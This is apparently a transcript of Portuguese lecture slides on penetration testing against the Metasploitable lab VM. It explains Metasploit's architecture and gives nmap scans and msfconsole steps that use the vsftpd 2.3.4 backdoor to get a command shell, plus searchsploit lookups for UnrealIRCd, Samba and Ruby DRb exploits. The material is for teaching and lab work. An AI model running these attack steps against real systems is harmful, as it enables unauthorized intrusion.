invasaocom exploits
TRANSCRIPT
Testes de SegurançaNauber Gois
Metasploitable - Linux com vulnerabilidades
nmap -Pn [target IP address]
O REX(Ruby Extension Library) é o núcleo do Metasploit, ele disponibiliza a API com funcionalidades que ajudam no desenvolvimento de um exploit, além de bibliotecas,
sockets e protocolos.
O CORE do framework é constituído de sub-sistemas que controlam sessões, módulos, eventos é a API base.
O BASE fornece uma API amigável e simplifica a comunicação com outros módulos, interfaces e plugins.
Na camada MODULES é onde reside os exploits e payloads, basicamente os exploits são programas escritos para explorar alguma falha e o payload é como um
complemento para o exploit. Basicamente o payload é o código que vai ser injetado no alvo, ao ser injetado alguma ação pré-definida será executada, por exemplo: (realizar um download, executar um arquivo, apagar alguma informação ou estabelecer uma
conexão com outro sistema).
A camada de INTERFACES conta com o modo console onde temos um shell poderoso que trabalha em conjunto com o SO, o cli que fornece uma interface onde é possível
automatizar testes de invasão e ainda temos interfaces web e gui.
Comandos do metasploit
Um exploit (em português explorar, significando "usar algo para sua própria vantagem") é um pedaço de software, um pedaço de dados ou uma sequência de comandos a fim de causar um comportamento acidental ou imprevisto a ocorrer no software ou hardware de um computador ou em algum eletrônico (normalmente computadorizado).
No caso de um exploit, o payload é a parte do código injetada na vítima que vai executar alguma ação: criar um usuário, iniciar um processo, apagar arquivos, etc. Ou seja lá o que for que o atacante quer que seja executado quando a vulnerabilidade for explorada com sucesso pelo seu exploit.
nmap -sV [IP] -p 21search vsftpd
msfconsole
When msfconsole is running select the backdoor exploit using the following command:
use exploit/unix/ftp/vsftpd_234_backdoor
Type the following command to have a look at the exploit options:
Show options
set rhost 192.168.25.168
show payloads
set payload cmd/unix/interact
run
Procurando por vulnerabilidades
nmap -sV [IP] -p 6667search unreal ircd
nmap -sV [IP] -p 80search apache
nmap -sV [IP] -p 139search samba
nmap -sV [IP] -p8787
searchsploit -e Ruby DRb RMI
searchsploit -e Ruby
cat /usr/share/exploitdb/platforms/linux/remote/17058.rb
search name:Distributed Ruby Send instance_eval/syscall Code Execution
Armitage